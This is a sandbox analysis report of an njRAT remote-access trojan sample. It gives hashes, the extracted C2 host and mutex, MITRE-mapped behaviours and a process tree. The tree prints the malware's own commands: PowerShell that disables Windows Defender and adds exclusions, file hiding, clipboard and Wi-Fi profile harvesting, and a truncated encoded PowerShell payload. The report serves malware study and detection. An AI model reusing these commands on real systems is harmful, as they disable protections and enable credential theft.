njrat | 1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
27-01-2025 16:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe
Size

10.3MB
MD5

41027641808a1da816718b483812fbf0
SHA1

1cd8602d5b53ce59e2545ab9b02df4da62af6860
SHA256

1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc
SHA512

7f11e1e3329ea702c98b886b7fa7c36ec14bcd6757ca498172fd4891e4db88a2eea0f05a3c604e1e5fbddd8830e265b7829e8321d56a940c6e9240f71df3f7ea
SSDEEP

196608:X8k6KKGQqCdWKSrGAKqGiuP0EUBBzpE+q:MWN7GB640lzprq

Score

10^/10

njrat hacked collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

on-weighted.gl.at.ply.gg:15883

Mutex

Windows Update

Attributes

reg_key
Windows Update
splitter
|Hassan|

Signatures

Njrat family
njrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4528	powershell.exe
4324	powershell.exe
1944	powershell.exe
4680	powershell.exe
3116	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	Crack.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5068	cmd.exe
2896	powershell.exe

Deletes itself 1 IoCs

pid	Process
3536	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.exe	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.exe	svchost.exe

Executes dropped EXE 5 IoCs

pid	Process
2448	Crack.exe
4016	Deushack.exe
4744	Deushack.exe
3152	svchost.exe
2556	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe
4744	Deushack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\" .."	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3996	tasklist.exe
4144	tasklist.exe
3412	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1412	cmd.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca1-135.dat	upx
behavioral2/memory/4744-142-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp	upx
behavioral2/files/0x0007000000023c94-145.dat	upx
behavioral2/files/0x0007000000023c9f-148.dat	upx
behavioral2/files/0x0007000000023c9b-164.dat	upx
behavioral2/memory/4744-166-0x00007FFC98DE0000-0x00007FFC98DEF000-memory.dmp	upx
behavioral2/memory/4744-165-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp	upx
behavioral2/files/0x0007000000023c9a-163.dat	upx
behavioral2/files/0x0007000000023c99-162.dat	upx
behavioral2/files/0x0007000000023c98-161.dat	upx
behavioral2/memory/4744-174-0x00007FFC93260000-0x00007FFC9328D000-memory.dmp	upx
behavioral2/memory/4744-176-0x00007FFC95680000-0x00007FFC95699000-memory.dmp	upx
behavioral2/files/0x0007000000023ca5-179.dat	upx
behavioral2/memory/4744-180-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp	upx
behavioral2/memory/4744-192-0x00007FFC8F860000-0x00007FFC8F88E000-memory.dmp	upx
behavioral2/memory/4744-191-0x00007FFC8F670000-0x00007FFC8F728000-memory.dmp	upx
behavioral2/files/0x0007000000023ca0-187.dat	upx
behavioral2/memory/4744-194-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp	upx
behavioral2/files/0x0007000000023ca6-204.dat	upx
behavioral2/memory/4744-205-0x00007FFC8F460000-0x00007FFC8F57C000-memory.dmp	upx
behavioral2/memory/4744-198-0x00007FFC93220000-0x00007FFC9322D000-memory.dmp	upx
behavioral2/memory/4744-197-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp	upx
behavioral2/memory/4744-195-0x00007FFC8F580000-0x00007FFC8F594000-memory.dmp	upx
behavioral2/files/0x0007000000023c96-193.dat	upx
behavioral2/files/0x0007000000023c9e-186.dat	upx
behavioral2/memory/4744-190-0x00007FFC7FDE0000-0x00007FFC80159000-memory.dmp	upx
behavioral2/memory/4744-189-0x00007FFC93EF0000-0x00007FFC93EFD000-memory.dmp	upx
behavioral2/files/0x0007000000023ca4-183.dat	upx
behavioral2/memory/4744-182-0x00007FFC94DA0000-0x00007FFC94DB9000-memory.dmp	upx
behavioral2/memory/4744-178-0x00007FFC93230000-0x00007FFC93253000-memory.dmp	upx
behavioral2/files/0x0007000000023c93-175.dat	upx
behavioral2/files/0x0007000000023c97-173.dat	upx
behavioral2/memory/4744-264-0x00007FFC93230000-0x00007FFC93253000-memory.dmp	upx
behavioral2/files/0x0007000000023c95-158.dat	upx
behavioral2/memory/4744-314-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp	upx
behavioral2/memory/4744-341-0x00007FFC94DA0000-0x00007FFC94DB9000-memory.dmp	upx
behavioral2/memory/4744-392-0x00007FFC8F670000-0x00007FFC8F728000-memory.dmp	upx
behavioral2/memory/4744-391-0x00007FFC7FDE0000-0x00007FFC80159000-memory.dmp	upx
behavioral2/memory/4744-417-0x00007FFC8F860000-0x00007FFC8F88E000-memory.dmp	upx
behavioral2/memory/4744-453-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp	upx
behavioral2/memory/4744-448-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp	upx
behavioral2/memory/4744-447-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp	upx
behavioral2/memory/4744-475-0x00007FFC8F670000-0x00007FFC8F728000-memory.dmp	upx
behavioral2/memory/4744-489-0x00007FFC7FDE0000-0x00007FFC80159000-memory.dmp	upx
behavioral2/memory/4744-488-0x00007FFC93EF0000-0x00007FFC93EFD000-memory.dmp	upx
behavioral2/memory/4744-487-0x00007FFC80160000-0x00007FFC802D0000-memory.dmp	upx
behavioral2/memory/4744-486-0x00007FFC93230000-0x00007FFC93253000-memory.dmp	upx
behavioral2/memory/4744-485-0x00007FFC95680000-0x00007FFC95699000-memory.dmp	upx
behavioral2/memory/4744-484-0x00007FFC93260000-0x00007FFC9328D000-memory.dmp	upx
behavioral2/memory/4744-483-0x00007FFC98DE0000-0x00007FFC98DEF000-memory.dmp	upx
behavioral2/memory/4744-482-0x00007FFC93290000-0x00007FFC932B3000-memory.dmp	upx
behavioral2/memory/4744-481-0x00007FFC94DA0000-0x00007FFC94DB9000-memory.dmp	upx
behavioral2/memory/4744-480-0x00007FFC802D0000-0x00007FFC808B9000-memory.dmp	upx
behavioral2/memory/4744-479-0x00007FFC8F860000-0x00007FFC8F88E000-memory.dmp	upx
behavioral2/memory/4744-478-0x00007FFC8F460000-0x00007FFC8F57C000-memory.dmp	upx
behavioral2/memory/4744-477-0x00007FFC93220000-0x00007FFC9322D000-memory.dmp	upx
behavioral2/memory/4744-476-0x00007FFC8F580000-0x00007FFC8F594000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crack.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2324	PING.EXE
4868	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2972	cmd.exe
3092	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3328	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3832	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2324	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3536	powershell.exe
3536	powershell.exe
4324	powershell.exe
4324	powershell.exe
1944	powershell.exe
1944	powershell.exe
4528	powershell.exe
4528	powershell.exe
1944	powershell.exe
1972	powershell.exe
1972	powershell.exe
2896	powershell.exe
2896	powershell.exe
4324	powershell.exe
1972	powershell.exe
2896	powershell.exe
4528	powershell.exe
4680	powershell.exe
4680	powershell.exe
1116	powershell.exe
1116	powershell.exe
3116	powershell.exe
3116	powershell.exe
4572	powershell.exe
4572	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3152	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	4144	tasklist.exe
Token: SeDebugPrivilege	3412	tasklist.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	3996	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3464	WMIC.exe
Token: SeSecurityPrivilege	3464	WMIC.exe
Token: SeTakeOwnershipPrivilege	3464	WMIC.exe
Token: SeLoadDriverPrivilege	3464	WMIC.exe
Token: SeSystemProfilePrivilege	3464	WMIC.exe
Token: SeSystemtimePrivilege	3464	WMIC.exe
Token: SeProfSingleProcessPrivilege	3464	WMIC.exe
Token: SeIncBasePriorityPrivilege	3464	WMIC.exe
Token: SeCreatePagefilePrivilege	3464	WMIC.exe
Token: SeBackupPrivilege	3464	WMIC.exe
Token: SeRestorePrivilege	3464	WMIC.exe
Token: SeShutdownPrivilege	3464	WMIC.exe
Token: SeDebugPrivilege	3464	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3464	WMIC.exe
Token: SeRemoteShutdownPrivilege	3464	WMIC.exe
Token: SeUndockPrivilege	3464	WMIC.exe
Token: SeManageVolumePrivilege	3464	WMIC.exe
Token: 33	3464	WMIC.exe
Token: 34	3464	WMIC.exe
Token: 35	3464	WMIC.exe
Token: 36	3464	WMIC.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeIncreaseQuotaPrivilege	3464	WMIC.exe
Token: SeSecurityPrivilege	3464	WMIC.exe
Token: SeTakeOwnershipPrivilege	3464	WMIC.exe
Token: SeLoadDriverPrivilege	3464	WMIC.exe
Token: SeSystemProfilePrivilege	3464	WMIC.exe
Token: SeSystemtimePrivilege	3464	WMIC.exe
Token: SeProfSingleProcessPrivilege	3464	WMIC.exe
Token: SeIncBasePriorityPrivilege	3464	WMIC.exe
Token: SeCreatePagefilePrivilege	3464	WMIC.exe
Token: SeBackupPrivilege	3464	WMIC.exe
Token: SeRestorePrivilege	3464	WMIC.exe
Token: SeShutdownPrivilege	3464	WMIC.exe
Token: SeDebugPrivilege	3464	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3464	WMIC.exe
Token: SeRemoteShutdownPrivilege	3464	WMIC.exe
Token: SeUndockPrivilege	3464	WMIC.exe
Token: SeManageVolumePrivilege	3464	WMIC.exe
Token: 33	3464	WMIC.exe
Token: 34	3464	WMIC.exe
Token: 35	3464	WMIC.exe
Token: 36	3464	WMIC.exe
Token: SeDebugPrivilege	4680	powershell.exe
Token: SeDebugPrivilege	1116	powershell.exe
Token: SeIncreaseQuotaPrivilege	2168	WMIC.exe
Token: SeSecurityPrivilege	2168	WMIC.exe
Token: SeTakeOwnershipPrivilege	2168	WMIC.exe
Token: SeLoadDriverPrivilege	2168	WMIC.exe
Token: SeSystemProfilePrivilege	2168	WMIC.exe
Token: SeSystemtimePrivilege	2168	WMIC.exe
Token: SeProfSingleProcessPrivilege	2168	WMIC.exe
Token: SeIncBasePriorityPrivilege	2168	WMIC.exe
Token: SeCreatePagefilePrivilege	2168	WMIC.exe
Token: SeBackupPrivilege	2168	WMIC.exe
Token: SeRestorePrivilege	2168	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1504 wrote to memory of 2448	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	83
PID 1504 wrote to memory of 2448	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	83
PID 1504 wrote to memory of 2448	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	83
PID 1504 wrote to memory of 4016	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	84
PID 1504 wrote to memory of 4016	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	84
PID 4016 wrote to memory of 4744	4016	Deushack.exe	86
PID 4016 wrote to memory of 4744	4016	Deushack.exe	86
PID 1504 wrote to memory of 3536	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	85
PID 1504 wrote to memory of 3536	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	85
PID 1504 wrote to memory of 3536	1504	1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe	85
PID 4744 wrote to memory of 544	4744	Deushack.exe	88
PID 4744 wrote to memory of 544	4744	Deushack.exe	88
PID 4744 wrote to memory of 3540	4744	Deushack.exe	89
PID 4744 wrote to memory of 3540	4744	Deushack.exe	89
PID 4744 wrote to memory of 1412	4744	Deushack.exe	136
PID 4744 wrote to memory of 1412	4744	Deushack.exe	136
PID 4744 wrote to memory of 4344	4744	Deushack.exe	94
PID 4744 wrote to memory of 4344	4744	Deushack.exe	94
PID 4744 wrote to memory of 3936	4744	Deushack.exe	96
PID 4744 wrote to memory of 3936	4744	Deushack.exe	96
PID 4744 wrote to memory of 2256	4744	Deushack.exe	97
PID 4744 wrote to memory of 2256	4744	Deushack.exe	97
PID 4744 wrote to memory of 3824	4744	Deushack.exe	100
PID 4744 wrote to memory of 3824	4744	Deushack.exe	100
PID 4744 wrote to memory of 5068	4744	Deushack.exe	101
PID 4744 wrote to memory of 5068	4744	Deushack.exe	101
PID 4744 wrote to memory of 2428	4744	Deushack.exe	103
PID 4744 wrote to memory of 2428	4744	Deushack.exe	103
PID 4744 wrote to memory of 4212	4744	Deushack.exe	105
PID 4744 wrote to memory of 4212	4744	Deushack.exe	105
PID 4744 wrote to memory of 2972	4744	Deushack.exe	107
PID 4744 wrote to memory of 2972	4744	Deushack.exe	107
PID 3936 wrote to memory of 3412	3936	cmd.exe	109
PID 3936 wrote to memory of 3412	3936	cmd.exe	109
PID 4744 wrote to memory of 4308	4744	Deushack.exe	110
PID 4744 wrote to memory of 4308	4744	Deushack.exe	110
PID 4744 wrote to memory of 3456	4744	Deushack.exe	113
PID 4744 wrote to memory of 3456	4744	Deushack.exe	113
PID 2256 wrote to memory of 4144	2256	cmd.exe	115
PID 2256 wrote to memory of 4144	2256	cmd.exe	115
PID 4344 wrote to memory of 4528	4344	cmd.exe	116
PID 4344 wrote to memory of 4528	4344	cmd.exe	116
PID 544 wrote to memory of 4324	544	cmd.exe	117
PID 544 wrote to memory of 4324	544	cmd.exe	117
PID 1412 wrote to memory of 1948	1412	cmd.exe	118
PID 1412 wrote to memory of 1948	1412	cmd.exe	118
PID 3540 wrote to memory of 1944	3540	cmd.exe	119
PID 3540 wrote to memory of 1944	3540	cmd.exe	119
PID 4212 wrote to memory of 4780	4212	cmd.exe	121
PID 4212 wrote to memory of 4780	4212	cmd.exe	121
PID 3456 wrote to memory of 1972	3456	cmd.exe	122
PID 3456 wrote to memory of 1972	3456	cmd.exe	122
PID 2972 wrote to memory of 3092	2972	cmd.exe	123
PID 2972 wrote to memory of 3092	2972	cmd.exe	123
PID 5068 wrote to memory of 2896	5068	cmd.exe	124
PID 5068 wrote to memory of 2896	5068	cmd.exe	124
PID 2428 wrote to memory of 3996	2428	cmd.exe	125
PID 2428 wrote to memory of 3996	2428	cmd.exe	125
PID 3824 wrote to memory of 3464	3824	cmd.exe	126
PID 3824 wrote to memory of 3464	3824	cmd.exe	126
PID 4308 wrote to memory of 3832	4308	cmd.exe	127
PID 4308 wrote to memory of 3832	4308	cmd.exe	127
PID 4744 wrote to memory of 4540	4744	Deushack.exe	128
PID 4744 wrote to memory of 4540	4744	Deushack.exe	128

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1948	attrib.exe

C:\Users\Admin\AppData\Local\Temp\1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe
"C:\Users\Admin\AppData\Local\Temp\1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Users\Admin\AppData\Local\Temp\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\Crack.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2448
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3152
- C:\Users\Admin\AppData\Local\Temp\Deushack.exe
  "C:\Users\Admin\AppData\Local\Temp\Deushack.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Users\Admin\AppData\Local\Temp\Deushack.exe
    "C:\Users\Admin\AppData\Local\Temp\Deushack.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Deushack.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Deushack.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3540
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Deushack.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Deushack.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ‎ .scr'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌ ‎ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3936
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2256
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4144
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3824
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:5068
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2428
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4212
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:2972
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4308
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:3832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACg